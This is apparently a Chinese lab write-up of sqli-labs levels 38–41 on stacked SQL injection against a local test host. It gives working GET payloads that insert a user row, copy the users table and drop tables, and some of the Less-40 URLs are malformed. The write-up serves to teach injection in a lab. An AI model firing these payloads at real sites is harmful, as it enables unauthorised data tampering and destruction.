Less38-Less41(堆叠注入 GET型)

Stacked injections:堆叠注入

从名词的含义就可以看到应该是一堆sql语句（多条）一起执行。而在真实的运用中也是这样的，我们知道在mysql中，主要是命令行中，每一条语句结尾加 ; 表示语句结束。这样我们就想到了是不是可以多句一起使用。这个叫做stacked injection。

 

 

 

 

 参考原文： https://www.cnblogs.com/lcamry/p/5762905.html

 

Less38：使用’1’进行包裹 

 

 

 

 

 注入可以参考https://blog.csdn.net/Kevinhanser/article/details/81592862

 

http://192.168.27.156/sqli-labs/Less-38/?id=1';insert into users(id,username,password) values ('38','gxy','38')--+

 

 

 Less-39: id 没有进行任何包裹  其他与第38关一致

 

 

 

http://192.168.27.156/sqli-labs/Less-39/?id=1;create table gxy39 like users;insert into gxy39 select * from users;--+

 

 

 

 

 

 

http://192.168.27.156/sqli-labs/Less-39/?id=1;drop table gxy39  --+

 

 

 

 

Less-40:使用(‘1’)进行包裹  其他与第38关一致

 

 

 

http://192.168.27.156/sqli-labs/Less-40/?id=1?id=1');create table gxy40 like users;insert into  gxy40 select *from users; --

 

 

 

 

 

 

 http://192.168.27.156/sqli-labs/Less-40/?id=1?id=1');drop table gxy40 ;

 

 

 

 

 

Less41： 无包裹，不回显错误  其他与第38关一致

http://192.168.27.156/sqli-labs/Less-41/?id=1'

 

 

 http://192.168.27.156/sqli-labs/Less-41/?id=1; create table gxy41  like users;insert into  gxy41 select *from users; --